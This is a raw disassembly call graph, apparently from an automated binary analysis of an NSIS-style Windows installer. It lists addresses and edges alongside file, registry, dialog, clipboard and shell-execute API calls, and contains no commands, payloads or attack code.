3552->3553 3553->3369 3554->3359 3556 406a8e PeekMessageW 3555->3556 3557 406a84 DispatchMessageW 3556->3557 3558 406a9e 3556->3558 3557->3556 3558->3528 3560 403021 3559->3560 3561 403023 MulDiv 3559->3561 3560->3561 3561->3532 3563 4056e5 3562->3563 3572 4030a8 3562->3572 3564 405701 lstrlenW 3563->3564 3567 4066a5 17 API calls 3563->3567 3565 40572a 3564->3565 3566 40570f lstrlenW 3564->3566 3569 405730 SetWindowTextW 3565->3569 3570 40573d 3565->3570 3568 405721 lstrcatW 3566->3568 3566->3572 3567->3564 3568->3565 3569->3570 3571 405743 SendMessageW SendMessageW SendMessageW 3570->3571 3570->3572 3571->3572 3572->3528 3574 4035d1 3573->3574 3575 4034a7 3573->3575 3576 40302e 32 API calls 3574->3576 3590 4035f8 SetFilePointer 3575->3590 3583 4033a3 3576->3583 3578 4034b2 SetFilePointer 3582 4034d7 3578->3582 3579 4035e2 ReadFile 3579->3582 3581 40302e 32 API calls 3581->3582 3582->3579 3582->3581 3582->3583 3584 40620a WriteFile 3582->3584 3585 4035b2 SetFilePointer 3582->3585 3591 406bb0 3582->3591 3583->3550 3586 4061db ReadFile 3583->3586 3584->3582 3585->3574 3587 4033bc 3586->3587 3587->3543 3587->3550 3589 406228 3588->3589 3589->3548 3590->3578 3592 406bd5 3591->3592 3593 406bdd 3591->3593 3592->3582 3593->3592 3594 406c64 GlobalFree 3593->3594 3595 406c6d GlobalAlloc 3593->3595 3596 406ce4 GlobalAlloc 3593->3596 3597 406cdb GlobalFree 3593->3597 3594->3595 3595->3592 3595->3593 3596->3592 3596->3593 3597->3596 3599 404001 3598->3599 3620 4065af wsprintfW 3599->3620 3601 404072 3621 4040a6 3601->3621 3603 403da2 3603->3384 3604 404077 3604->3603 3605 4066a5 17 API calls 3604->3605 3605->3604 3624 404610 3606->3624 3608 404610 SendMessageW 3609 4057f9 CoUninitialize 3608->3609 3609->3416 3610 4057c0 3612 4057e7 3610->3612 3627 401389 3610->3627 3612->3608 3613->3380 3631 4064d5 3614->3631 3617 403d73 3617->3379 3617->3381 3618 40656a RegQueryValueExW RegCloseKey 3618->3617 3619->3386 3620->3601 3622 4066a5 17 API calls 3621->3622 3623 4040b4 SetWindowTextW 3622->3623 3623->3604 3625 404628 3624->3625 3626 404619 SendMessageW 3624->3626 3625->3610 3626->3625 3629 401390 3627->3629 3628 4013fe 3628->3610 3629->3628 3630 4013cb MulDiv SendMessageW 3629->3630 3630->3629 3632 4064e4 3631->3632 3633 4064e8 3632->3633 3634 4064ed RegOpenKeyExW 3632->3634 3633->3617 3633->3618 3634->3633 3635->3430 3637 406011 3636->3637 3638 405fff 3636->3638 3640 405f64 CharNextW 3637->3640 3641 406035 3637->3641 3638->3637 3639 40600c CharNextW 3638->3639 3639->3641 3640->3637 3641->3433 3641->3434 3643 4069b4 FindClose 3642->3643 3644 4069bf 3642->3644 3643->3644 3644->3440 3645->3461 3646->3461 3647->3459 3649 406304 GetShortPathNameW 3648->3649 3650 4062de 3648->3650 3651 406423 3649->3651 3652 406319 3649->3652 3675 406158 GetFileAttributesW CreateFileW 3650->3675 3651->3475 3652->3651 3654 406321 wsprintfA 3652->3654 3657 4066a5 17 API calls 3654->3657 3655 4062e8 CloseHandle GetShortPathNameW 3655->3651 3656 4062fc 3655->3656 3656->3649 3656->3651 3658 406349 3657->3658 3676 406158 GetFileAttributesW CreateFileW 3658->3676 3660 406356 3660->3651 3661 406365 GetFileSize GlobalAlloc 3660->3661 3662 406387 3661->3662 3663 40641c CloseHandle 3661->3663 3664 4061db ReadFile 3662->3664 3663->3651 3665 40638f 3664->3665 3665->3663 3677 4060bd lstrlenA 3665->3677 3668 4063a6 lstrcpyA 3671 4063c8 3668->3671 3669 4063ba 3670 4060bd 4 API calls 3669->3670 3670->3671 3672 4063ff SetFilePointer 3671->3672 3673 40620a WriteFile 3672->3673 3674 406415 GlobalFree 3673->3674 3674->3663 3675->3655 3676->3660 3678 4060fe lstrlenA 3677->3678 3679 406106 3678->3679 3680 4060d7 lstrcmpiA 3678->3680 3679->3668 3679->3669 3680->3679 3681 4060f5 CharNextA 3680->3681 3681->3678 3683 403c90 3682->3683 3684 403c59 3683->3684 3685 403c95 FreeLibrary GlobalFree 3683->3685 3686 405d74 3684->3686 3685->3684 3685->3685 3687 40603f 18 API calls 3686->3687 3688 405d94 3687->3688 3689 405d9c DeleteFileW 3688->3689 3690 405db3 3688->3690 3696 403b71 OleUninitialize 3689->3696 3691 405ed3 3690->3691 3722 406668 lstrcpynW 3690->3722 3691->3696 3699 40699e 2 API calls 3691->3699 3693 405dd9 3694 405dec 3693->3694 3695 405ddf lstrcatW 3693->3695 3698 405f83 2 API calls 3694->3698 3697 405df2 3695->3697 3696->3269 3696->3270 3700 405e02 lstrcatW 3697->3700 3702 405e0d lstrlenW FindFirstFileW 3697->3702 3698->3697 3701 405ef8 3699->3701 3700->3702 3701->3696 3703 405f37 3 API calls 3701->3703 3702->3691 3720 405e2f 3702->3720 3704 405f02 3703->3704 3706 405d2c 5 API calls 3704->3706 3705 405eb6 FindNextFileW 3709 405ecc FindClose 3705->3709 3705->3720 3708 405f0e 3706->3708 3710 405f12 3708->3710 3711 405f28 3708->3711 3709->3691 3710->3696 3715 4056ca 24 API calls 3710->3715 3713 4056ca 24 API calls 3711->3713 3713->3696 3714 405d74 60 API calls 3714->3720 3716 405f1f 3715->3716 3717 406428 36 API calls 3716->3717 3717->3696 3718 4056ca 24 API calls 3718->3705 3719 4056ca 24 API calls 3719->3720 3720->3705 3720->3714 3720->3718 3720->3719 3721 406428 36 API calls 3720->3721 3723 406668 lstrcpynW 3720->3723 3724 405d2c 3720->3724 3721->3720 3722->3693 3723->3720 3732 406133 GetFileAttributesW 3724->3732 3727 405d47 RemoveDirectoryW 3730 405d55 3727->3730 3728 405d4f DeleteFileW 3728->3730 3729 405d59 3729->3720 3730->3729 3731 405d65 SetFileAttributesW 3730->3731 3731->3729 3733 405d38 3732->3733 3734 406145 SetFileAttributesW 3732->3734 3733->3727 3733->3728 3733->3729 3734->3733 3735 4015c1 3755 402da6 3735->3755 3738 405fe2 4 API calls 3750 4015d1 3738->3750 3739 401631 3741 401663 3739->3741 3742 401636 3739->3742 3740 405f64 CharNextW 3740->3750 3745 401423 24 API calls 3741->3745 3761 401423 3742->3761 3752 40165b 3745->3752 3747 405c16 2 API calls 3747->3750 3748 405c33 5 API calls 3748->3750 3749 40164a SetCurrentDirectoryW 3749->3752 3750->3739 3750->3740 3750->3747 3750->3748 3751 4015fa 3750->3751 3753 401617 GetFileAttributesW 3750->3753 3751->3750 3754 405b99 4 API calls 3751->3754 3753->3750 3754->3751 3756 402db2 3755->3756 3757 4066a5 17 API calls 3756->3757 3758 402dd3 3757->3758 3759 4015c8 3758->3759 3760 4068ef 5 API calls 3758->3760 3759->3738 3760->3759 3762 4056ca 24 API calls 3761->3762 3763 401431 3762->3763 3764 406668 lstrcpynW 3763->3764 3764->3749 3765 401c43 3787 402d84 3765->3787 3767 401c4a 3768 402d84 17 API calls 3767->3768 3769 401c57 3768->3769 3770 401c6c 3769->3770 3771 402da6 17 API calls 3769->3771 3772 401c7c 3770->3772 3773 402da6 17 API calls 3770->3773 3771->3770 3774 401cd3 3772->3774 3775 401c87 3772->3775 3773->3772 3776 402da6 17 API calls 3774->3776 3777 402d84 17 API calls 3775->3777 3778 401cd8 3776->3778 3779 401c8c 3777->3779 3780 402da6 17 API calls 3778->3780 3781 402d84 17 API calls 3779->3781 3782 401ce1 FindWindowExW 3780->3782 3783 401c98 3781->3783 3786 401d03 3782->3786 3784 401cc3 SendMessageW 3783->3784 3785 401ca5 SendMessageTimeoutW 3783->3785 3784->3786 3785->3786 3788 4066a5 17 API calls 3787->3788 3789 402d99 3788->3789 3789->3767 4115 4028c4 4116 4028ca 4115->4116 4117 4028d2 FindClose 4116->4117 4118 402c2a 4116->4118 4117->4118 3815 4040c5 3816 4040dd 3815->3816 3817 40423e 3815->3817 3816->3817 3818 4040e9 3816->3818 3819 40424f GetDlgItem GetDlgItem 3817->3819 3825 40428f 3817->3825 3822 4040f4 SetWindowPos 3818->3822 3823 404107 3818->3823 3820 4045c4 18 API calls 3819->3820 3824 404279 SetClassLongW 3820->3824 3821 4042e9 3826 404610 SendMessageW 3821->3826 3833 404239 3821->3833 3822->3823 3827 404110 ShowWindow 3823->3827 3828 404152 3823->3828 3829 40140b 2 API calls 3824->3829 3825->3821 3832 401389 2 API calls 3825->3832 3855 4042fb 3826->3855 3834 404130 GetWindowLongW 3827->3834 3835 40422b 3827->3835 3830 404171 3828->3830 3831 40415a DestroyWindow 3828->3831 3829->3825 3838 404176 SetWindowLongW 3830->3838 3839 404187 3830->3839 3837 40454d 3831->3837 3840 4042c1 3832->3840 3834->3835 3836 404149 ShowWindow 3834->3836 3897 40462b 3835->3897 3836->3828 3837->3833 3846 40457e ShowWindow 3837->3846 3838->3833 3839->3835 3843 404193 GetDlgItem 3839->3843 3840->3821 3844 4042c5 SendMessageW 3840->3844 3842 40454f DestroyWindow EndDialog 3842->3837 3847 4041c1 3843->3847 3848 4041a4 SendMessageW IsWindowEnabled 3843->3848 3844->3833 3845 40140b 2 API calls 3845->3855 3846->3833 3850 4041ce 3847->3850 3852 404215 SendMessageW 3847->3852 3853 4041e1 3847->3853 3861 4041c6 3847->3861 3848->3833 3848->3847 3849 4066a5 17 API calls 3849->3855 3850->3852 3850->3861 3852->3835 3856 4041e9 3853->3856 3857 4041fe 3853->3857 3854 4041fc 3854->3835 3855->3833 3855->3842 3855->3845 3855->3849 3859 4045c4 18 API calls 3855->3859 3879 40448f DestroyWindow 3855->3879 3888 4045c4 3855->3888 3858 40140b 2 API calls 3856->3858 3860 40140b 2 API calls 3857->3860 3858->3861 3859->3855 3862 404205 3860->3862 3894 40459d 3861->3894 3862->3835 3862->3861 3864 404376 GetDlgItem 3865 404393 ShowWindow KiUserCallbackDispatcher 3864->3865 3866 40438b 3864->3866 3891 4045e6 KiUserCallbackDispatcher 3865->3891 3866->3865 3868 4043bd EnableWindow 3873 4043d1 3868->3873 3869 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3870 404406 SendMessageW 3869->3870 3869->3873 3870->3873 3872 4040a6 18 API calls 3872->3873 3873->3869 3873->3872 3892 4045f9 SendMessageW 3873->3892 3893 406668 lstrcpynW 3873->3893 3875 404435 lstrlenW 3876 4066a5 17 API calls 3875->3876 3877 40444b SetWindowTextW 3876->3877 3878 401389 2 API calls 3877->3878 3878->3855 3879->3837 3880 4044a9 CreateDialogParamW 3879->3880 3880->3837 3881 4044dc 3880->3881 3882 4045c4 18 API calls 3881->3882 3883 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3882->3883 3884 401389 2 API calls 3883->3884 3885 40452d 3884->3885 3885->3833 3886 404535 ShowWindow 3885->3886 3887 404610 SendMessageW 3886->3887 3887->3837 3889 4066a5 17 API calls 3888->3889 3890 4045cf SetDlgItemTextW 3889->3890 3890->3864 3891->3868 3892->3873 3893->3875 3895 4045a4 3894->3895 3896 4045aa SendMessageW 3894->3896 3895->3896 3896->3854 3898 4046ee 3897->3898 3899 404643 GetWindowLongW 3897->3899 3898->3833 3899->3898 3900 404658 3899->3900 3900->3898 3901 404685 GetSysColor 3900->3901 3902 404688 3900->3902 3901->3902 3903 404698 SetBkMode 3902->3903 3904 40468e SetTextColor 3902->3904 3905 4046b0 GetSysColor 3903->3905 3906 4046b6 3903->3906 3904->3903 3905->3906 3907 4046c7 3906->3907 3908 4046bd SetBkColor 3906->3908 3907->3898 3909 4046e1 CreateBrushIndirect 3907->3909 3910 4046da DeleteObject 3907->3910 3908->3907 3909->3898 3910->3909 4122 4016cc 4123 402da6 17 API calls 4122->4123 4124 4016d2 GetFullPathNameW 4123->4124 4125 4016ec 4124->4125 4131 40170e 4124->4131 4128 40699e 2 API calls 4125->4128 4125->4131 4126 401723 GetShortPathNameW 4127 402c2a 4126->4127 4129 4016fe 4128->4129 4129->4131 4132 406668 lstrcpynW 4129->4132 4131->4126 4131->4127 4132->4131 4133 401e4e GetDC 4134 402d84 17 API calls 4133->4134 4135 401e60 GetDeviceCaps MulDiv ReleaseDC 4134->4135 4136 402d84 17 API calls 4135->4136 4137 401e91 4136->4137 4138 4066a5 17 API calls 4137->4138 4139 401ece CreateFontIndirectW 4138->4139 4140 402638 4139->4140 4141 402950 4142 402da6 17 API calls 4141->4142 4144 40295c 4142->4144 4143 402972 4146 406133 2 API calls 4143->4146 4144->4143 4145 402da6 17 API calls 4144->4145 4145->4143 4147 402978 4146->4147 4169 406158 GetFileAttributesW CreateFileW 4147->4169 4149 402985 4150 402a3b 4149->4150 4153 4029a0 GlobalAlloc 4149->4153 4154 402a23 4149->4154 4151 402a42 DeleteFileW 4150->4151 4152 402a55 4150->4152 4151->4152 4153->4154 4155 4029b9 4153->4155 4156 403371 44 API calls 4154->4156 4170 4035f8 SetFilePointer 4155->4170 4158 402a30 CloseHandle 4156->4158 4158->4150 4159 4029bf 4160 4035e2 ReadFile 4159->4160 4161 4029c8 GlobalAlloc 4160->4161 4162 4029d8 4161->4162 4163 402a0c 4161->4163 4164 403371 44 API calls 4162->4164 4165 40620a WriteFile 4163->4165 4168 4029e5 4164->4168 4166 402a18 GlobalFree 4165->4166 4166->4154 4167 402a03 GlobalFree 4167->4163 4168->4167 4169->4149 4170->4159 4178 403cd5 4179 403ce0 4178->4179 4180 403ce4 4179->4180 4181 403ce7 GlobalAlloc 4179->4181 4181->4180 4182 401956 4183 402da6 17 API calls 4182->4183 4184 40195d lstrlenW 4183->4184 4185 402638 4184->4185 4186 4014d7 4187 402d84 17 API calls 4186->4187 4188 4014dd Sleep 4187->4188 4190 402c2a 4188->4190 4062 4020d8 4063 4020ea 4062->4063 4073 40219c 4062->4073 4064 402da6 17 API calls 4063->4064 4065 4020f1 4064->4065 4067 402da6 17 API calls 4065->4067 4066 401423 24 API calls 4068 4022f6 4066->4068 4069 4020fa 4067->4069 4070 402110 LoadLibraryExW 4069->4070 4071 402102 GetModuleHandleW 4069->4071 4072 402121 4070->4072 4070->4073 4071->4070 4071->4072 4082 406aa4 4072->4082 4073->4066 4076 402132 4079 401423 24 API calls 4076->4079 4080 402142 4076->4080 4077 40216b 4078 4056ca 24 API calls 4077->4078 4078->4080 4079->4080 4080->4068 4081 40218e FreeLibrary 4080->4081 4081->4068 4087 40668a WideCharToMultiByte 4082->4087 4084 406ac1 4085 406ac8 GetProcAddress 4084->4085 4086 40212c 4084->4086 4085->4086 4086->4076 4086->4077 4087->4084 4191 402b59 4192 402b60 4191->4192 4193 402bab 4191->4193 4196 402d84 17 API calls 4192->4196 4198 402ba9 4192->4198 4194 406a35 5 API calls 4193->4194 4195 402bb2 4194->4195 4197 402da6 17 API calls 4195->4197 4199 402b6e 4196->4199 4200 402bbb 4197->4200 4201 402d84 17 API calls 4199->4201 4200->4198 4202 402bbf IIDFromString 4200->4202 4204 402b7a 4201->4204 4202->4198 4203 402bce 4202->4203 4203->4198 4209 406668 lstrcpynW 4203->4209 4208 4065af wsprintfW 4204->4208 4206 402beb CoTaskMemFree 4206->4198 4208->4198 4209->4206 4210 402a5b 4211 402d84 17 API calls 4210->4211 4212 402a61 4211->4212 4213 402aa4 4212->4213 4214 402a88 4212->4214 4220 40292e 4212->4220 4216 402abe 4213->4216 4217 402aae 4213->4217 4215 402a8d 4214->4215 4223 402a9e 4214->4223 4224 406668 lstrcpynW 4215->4224 4219 4066a5 17 API calls 4216->4219 4218 402d84 17 API calls 4217->4218 4218->4223 4219->4223 4223->4220 4225 4065af wsprintfW 4223->4225 4224->4220 4225->4220 4226 40175c 4227 402da6 17 API calls 4226->4227 4228 401763 4227->4228 4229 406187 2 API calls 4228->4229 4230 40176a 4229->4230 4230->4230 4231 401d5d 4232 402d84 17 API calls 4231->4232 4233 401d6e SetWindowLongW 4232->4233 4234 402c2a 4233->4234 4235 4028de 4236 4028e6 4235->4236 4237 4028ea FindNextFileW 4236->4237 4239 4028fc 4236->4239 4238 402943 4237->4238 4237->4239 4241 406668 lstrcpynW 4238->4241 4241->4239 4242 406d5f 4248 406be3 4242->4248 4243 40754e 4244 406c64 GlobalFree 4245 406c6d GlobalAlloc 4244->4245 4245->4243 4245->4248 4246 406ce4 GlobalAlloc 4246->4243 4246->4248 4247 406cdb GlobalFree 4247->4246 4248->4243 4248->4244 4248->4245 4248->4246 4248->4247 4249 401563 4250 402ba4 4249->4250 4253 4065af wsprintfW 4250->4253 4252 402ba9 4253->4252 4254 401968 4255 402d84 17 API calls 4254->4255 4256 40196f 4255->4256 4257 402d84 17 API calls 4256->4257 4258 40197c 4257->4258 4259 402da6 17 API calls 4258->4259 4260 401993 lstrlenW 4259->4260 4262 4019a4 4260->4262 4261 4019e5 4262->4261 4266 406668 lstrcpynW 4262->4266 4264 4019d5 4264->4261 4265 4019da lstrlenW 4264->4265 4265->4261 4266->4264 4274 40166a 4275 402da6 17 API calls 4274->4275 4276 401670 4275->4276 4277 40699e 2 API calls 4276->4277 4278 401676 4277->4278 4279 402aeb 4280 402d84 17 API calls 4279->4280 4281 402af1 4280->4281 4282 40292e 4281->4282 4283 4066a5 17 API calls 4281->4283 4283->4282 4284 4026ec 4285 402d84 17 API calls 4284->4285 4286 4026fb 4285->4286 4287 402745 ReadFile 4286->4287 4288 4061db ReadFile 4286->4288 4290 402785 MultiByteToWideChar 4286->4290 4291 40283a 4286->4291 4293 4027ab SetFilePointer MultiByteToWideChar 4286->4293 4294 40284b 4286->4294 4296 402838 4286->4296 4297 406239 SetFilePointer 4286->4297 4287->4286 4287->4296 4288->4286 4290->4286 4306 4065af wsprintfW 4291->4306 4293->4286 4295 40286c SetFilePointer 4294->4295 4294->4296 4295->4296 4298 406255 4297->4298 4301 40626d 4297->4301 4299 4061db ReadFile 4298->4299 4300 406261 4299->4300 4300->4301 4302 406276 SetFilePointer 4300->4302 4303 40629e SetFilePointer 4300->4303 4301->4286 4302->4303 4304 406281 4302->4304 4303->4301 4305 40620a WriteFile 4304->4305 4305->4301 4306->4296 4307 404a6e 4308 404aa4 4307->4308 4309 404a7e 4307->4309 4311 40462b 8 API calls 4308->4311 4310 4045c4 18 API calls 4309->4310 4312 404a8b SetDlgItemTextW 4310->4312 4313 404ab0 4311->4313 4312->4308 3977 40176f 3978 402da6 17 API calls 3977->3978 3979 401776 3978->3979 3980 401796 3979->3980 3981 40179e 3979->3981 4016 406668 lstrcpynW 3980->4016 4017 406668 lstrcpynW 3981->4017 3984 40179c 3988 4068ef 5 API calls 3984->3988 3985 4017a9 3986 405f37 3 API calls 3985->3986 3987 4017af lstrcatW 3986->3987 3987->3984 4004 4017bb 3988->4004 3989 40699e 2 API calls 3989->4004 3990 406133 2 API calls 3990->4004 3992 4017cd CompareFileTime 3992->4004 3993 40188d 3995 4056ca 24 API calls 3993->3995 3994 401864 3997 4056ca 24 API calls 3994->3997 4006 401879 3994->4006 3996 401897 3995->3996 3999 403371 44 API calls 3996->3999 3997->4006 3998 406668 lstrcpynW 3998->4004 4000 4018aa 3999->4000 4001 4018be SetFileTime 4000->4001 4003 4018d0 CloseHandle 4000->4003 4001->4003 4002 4066a5 17 API calls 4002->4004 4005 4018e1 4003->4005 4003->4006 4004->3989 4004->3990 4004->3992 4004->3993 4004->3994 4004->3998 4004->4002 4011 405cc8 MessageBoxIndirectW 4004->4011 4015 406158 GetFileAttributesW CreateFileW 4004->4015 4007 4018e6 4005->4007 4008 4018f9 4005->4008 4009 4066a5 17 API calls 4007->4009 4010 4066a5 17 API calls 4008->4010 4012 4018ee lstrcatW 4009->4012 4013 401901 4010->4013 4011->4004 4012->4013 4014 405cc8 MessageBoxIndirectW 4013->4014 4014->4006 4015->4004 4016->3984 4017->3985 4314 401a72 4315 402d84 17 API calls 4314->4315 4316 401a7b 4315->4316 4317 402d84 17 API calls 4316->4317 4318 401a20 4317->4318 4028 401573 4029 401583 ShowWindow 4028->4029 4030 40158c 4028->4030 4029->4030 4031 402c2a 4030->4031 4032 40159a ShowWindow 4030->4032 4032->4031 4319 4023f4 4320 402da6 17 API calls 4319->4320 4321 402403 4320->4321 4322 402da6 17 API calls 4321->4322 4323 40240c 4322->4323 4324 402da6 17 API calls 4323->4324 4325 402416 GetPrivateProfileStringW 4324->4325 4326 4014f5 SetForegroundWindow 4327 402c2a 4326->4327 4328 401ff6 4329 402da6 17 API calls 4328->4329 4330 401ffd 4329->4330 4331 40699e 2 API calls 4330->4331 4332 402003 4331->4332 4334 402014 4332->4334 4335 4065af wsprintfW 4332->4335 4335->4334 4336 401b77 4337 402da6 17 API calls 4336->4337 4338 401b7e 4337->4338 4339 402d84 17 API calls 4338->4339 4340 401b87 wsprintfW 4339->4340 4341 402c2a 4340->4341 4342 4046fa lstrcpynW lstrlenW 4088 40167b 4089 402da6 17 API calls 4088->4089 4090 401682 4089->4090 4091 402da6 17 API calls 4090->4091 4092 40168b 4091->4092 4093 402da6 17 API calls 4092->4093 4094 401694 MoveFileW 4093->4094 4095 4016a0 4094->4095 4096 4016a7 4094->4096 4098 401423 24 API calls 4095->4098 4097 40699e 2 API calls 4096->4097 4100 4022f6 4096->4100 4099 4016b6 4097->4099 4098->4100 4099->4100 4101 406428 36 API calls 4099->4101 4101->4095 4350 4019ff 4351 402da6 17 API calls 4350->4351 4352 401a06 4351->4352 4353 402da6 17 API calls 4352->4353 4354 401a0f 4353->4354 4355 401a16 lstrcmpiW 4354->4355 4356 401a28 lstrcmpW 4354->4356 4357 401a1c 4355->4357 4356->4357 4358 4022ff 4359 402da6 17 API calls 4358->4359 4360 402305 4359->4360 4361 402da6 17 API calls 4360->4361 4362 40230e 4361->4362 4363 402da6 17 API calls 4362->4363 4364 402317 4363->4364 4365 40699e 2 API calls 4364->4365 4366 402320 4365->4366 4367 402331 lstrlenW lstrlenW 4366->4367 4368 402324 4366->4368 4370 4056ca 24 API calls 4367->4370 4369 4056ca 24 API calls 4368->4369 4372 40232c 4368->4372 4369->4372 4371 40236f SHFileOperationW 4370->4371 4371->4368 4371->4372 4373 401000 4374 401037 BeginPaint GetClientRect 4373->4374 4376 40100c DefWindowProcW 4373->4376 4377 4010f3 4374->4377 4378 401179 4376->4378 4379 401073 CreateBrushIndirect FillRect DeleteObject 4377->4379 4380 4010fc 4377->4380 4379->4377 4381 401102 CreateFontIndirectW 4380->4381 4382 401167 EndPaint 4380->4382 4381->4382 4383 401112 6 API calls 4381->4383 4382->4378 4383->4382 4384 401d81 4385 401d94 GetDlgItem 4384->4385 4386 401d87 4384->4386 4388 401d8e 4385->4388 4387 402d84 17 API calls 4386->4387 4387->4388 4389 401dd5 GetClientRect LoadImageW SendMessageW 4388->4389 4390 402da6 17 API calls 4388->4390 4392 401e33 4389->4392 4394 401e3f 4389->4394 4390->4389 4393 401e38 DeleteObject 4392->4393 4392->4394 4393->4394 4395 401503 4396 40150b 4395->4396 4398 40151e 4395->4398 4397 402d84 17 API calls 4396->4397 4397->4398 4399 404783 4400 40479b 4399->4400 4404 4048b5 4399->4404 4405 4045c4 18 API calls 4400->4405 4401 40491f 4402 4049e9 4401->4402 4403 404929 GetDlgItem 4401->4403 4409 40462b 8 API calls 4402->4409 4406 4049aa 4403->4406 4410 404943 4403->4410 4404->4401 4404->4402 4407 4048f0 GetDlgItem SendMessageW 4404->4407 4408 404802 4405->4408 4406->4402 4412 4049bc 4406->4412 4432 4045e6 KiUserCallbackDispatcher 4407->4432 4414 4045c4 18 API calls 4408->4414 4415 4049e4 4409->4415 4410->4406 4411 404969 SendMessageW LoadCursorW SetCursor 4410->4411 4436 404a32 4411->4436 4417 4049d2 4412->4417 4418 4049c2 SendMessageW 4412->4418 4420 40480f CheckDlgButton 4414->4420 4417->4415 4422 4049d8 SendMessageW 4417->4422 4418->4417 4419 40491a 4433 404a0e 4419->4433 4430 4045e6 KiUserCallbackDispatcher 4420->4430 4422->4415 4425 40482d GetDlgItem 4431 4045f9 SendMessageW 4425->4431 4427 404843 SendMessageW 4428 404860 GetSysColor 4427->4428 4429 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4427->4429 4428->4429 4429->4415 4430->4425 4431->4427 4432->4419 4434 404a21 SendMessageW 4433->4434 4435 404a1c 4433->4435 4434->4401 4435->4434 4439 405c8e ShellExecuteExW 4436->4439 4438 404998 LoadCursorW SetCursor 4438->4406 4439->4438 4440 402383 4441 40238a 4440->4441 4444 40239d 4440->4444 4442 4066a5 17 API calls 4441->4442 4443 402397 4442->4443 4445 405cc8 MessageBoxIndirectW 4443->4445 4445->4444 4446 402c05 SendMessageW 4447 402c2a 4446->4447 4448 402c1f InvalidateRect 4446->4448 4448->4447 3911 405809 3912 4059b3 3911->3912 3913 40582a GetDlgItem GetDlgItem GetDlgItem 3911->3913 3915 4059e4 3912->3915 3916 4059bc GetDlgItem CreateThread CloseHandle 3912->3916 3956 4045f9 SendMessageW 3913->3956 3918 405a0f 3915->3918 3919 405a34 3915->3919 3920 4059fb ShowWindow ShowWindow 3915->3920 3916->3915 3959 40579d 5 API calls 3916->3959 3917 40589a 3922 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3917->3922 3921 405a6f 3918->3921 3924 405a23 3918->3924 3925 405a49 ShowWindow 3918->3925 3926 40462b 8 API calls 3919->3926 3958 4045f9 SendMessageW 3920->3958 3921->3919 3931 405a7d SendMessageW 3921->3931 3929 4058f3 SendMessageW SendMessageW 3922->3929 3930 40590f 3922->3930 3932 40459d SendMessageW 3924->3932 3927 405a69 3925->3927 3928 405a5b 3925->3928 3937 405a42 3926->3937 3934 40459d SendMessageW 3927->3934 3933 4056ca 24 API calls 3928->3933 3929->3930 3935 405922 3930->3935 3936 405914 SendMessageW 3930->3936 3931->3937 3938 405a96 CreatePopupMenu 3931->3938 3932->3919 3933->3927 3934->3921 3940 4045c4 18 API calls 3935->3940 3936->3935 3939 4066a5 17 API calls 3938->3939 3941 405aa6 AppendMenuW 3939->3941 3942 405932 3940->3942 3943 405ac3 GetWindowRect 3941->3943 3944 405ad6 TrackPopupMenu 3941->3944 3945 40593b ShowWindow 3942->3945 3946 40596f GetDlgItem SendMessageW 3942->3946 3943->3944 3944->3937 3948 405af1 3944->3948 3949 405951 ShowWindow 3945->3949 3950 40595e 3945->3950 3946->3937 3947 405996 SendMessageW SendMessageW 3946->3947 3947->3937 3951 405b0d SendMessageW 3948->3951 3949->3950 3957 4045f9 SendMessageW 3950->3957 3951->3951 3952 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3951->3952 3954 405b4f SendMessageW 3952->3954 3954->3954 3955 405b78 GlobalUnlock SetClipboardData CloseClipboard 3954->3955 3955->3937 3956->3917 3957->3946 3958->3918 4449 40248a 4450 402da6 17 API calls 4449->4450 4451 40249c 4450->4451 4452 402da6 17 API calls 4451->4452 4453 4024a6 4452->4453 4466 402e36 4453->4466 4456 40292e 4457 4024de 4459 4024ea 4457->4459 4462 402d84 17 API calls 4457->4462 4458 402da6 17 API calls 4461 4024d4 lstrlenW 4458->4461 4460 402509 RegSetValueExW 4459->4460 4463 403371 44 API calls 4459->4463 4464 40251f RegCloseKey 4460->4464 4461->4457 4462->4459 4463->4460 4464->4456 4467 402e51 4466->4467 4470 406503 4467->4470 4471 406512 4470->4471 4472 4024b6 4471->4472 4473 40651d RegCreateKeyExW 4471->4473 4472->4456 4472->4457 4472->4458 4473->4472 4474 404e0b 4475 404e37 4474->4475 4476 404e1b 4474->4476 4477 404e6a 4475->4477 4478 404e3d SHGetPathFromIDListW 4475->4478 4485 405cac GetDlgItemTextW 4476->4485 4480 404e54 SendMessageW 4478->4480 4481 404e4d 4478->4481 4480->4477 4483 40140b 2 API calls 4481->4483 4482 404e28 SendMessageW 4482->4475 4483->4480 4485->4482 4486 40290b 4487 402da6 17 API calls 4486->4487 4488 402912 FindFirstFileW 4487->4488 4489 40293a 4488->4489 4493 402925 4488->4493 4494 4065af wsprintfW 4489->4494 4491 402943 4495 406668 lstrcpynW 4491->4495 4494->4491 4495->4493 4496 40190c 4497 401943 4496->4497 4498 402da6 17 API calls 4497->4498 4499 401948 4498->4499 4500 405d74 67 API calls 4499->4500 4501 401951 4500->4501 4502 40190f 4503 402da6 17 API calls 4502->4503 4504 401916 4503->4504 4505 405cc8 MessageBoxIndirectW 4504->4505 4506 40191f 4505->4506 4507 401491 4508 4056ca 24 API calls 4507->4508 4509 401498 4508->4509 4510 402891 4511 402898 4510->4511 4512 402ba9 4510->4512 4513 402d84 17 API calls 4511->4513 4514 40289f 4513->4514 4515 4028ae SetFilePointer 4514->4515 4515->4512 4516 4028be 4515->4516 4518 4065af wsprintfW 4516->4518 4518->4512 4519 401f12 4520 402da6 17 API calls 4519->4520 4521 401f18 4520->4521 4522 402da6 17 API calls 4521->4522 4523 401f21 4522->4523 4524 402da6 17 API calls 4523->4524 4525 401f2a 4524->4525 4526 402da6 17 API calls 4525->4526 4527 401f33 4526->4527 4528 401423 24 API calls 4527->4528 4529 401f3a 4528->4529 4536 405c8e ShellExecuteExW 4529->4536 4531 401f82 4532 406ae0 5 API calls 4531->4532 4534 40292e 4531->4534 4533 401f9f CloseHandle 4532->4533 4533->4534 4536->4531 4537 402f93 4538 402fa5 SetTimer 4537->4538 4539 402fbe 4537->4539 4538->4539 4540 40300c 4539->4540 4541 403012 MulDiv 4539->4541 4542 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4541->4542 4542->4540 4558 401d17 4559 402d84 17 API calls 4558->4559 4560 401d1d IsWindow 4559->4560 4561 401a20 4560->4561 4562 401b9b 4563 401ba8 4562->4563 4564 401bec 4562->4564 4569 401c31 4563->4569 4571 401bbf 4563->4571 4565 401bf1 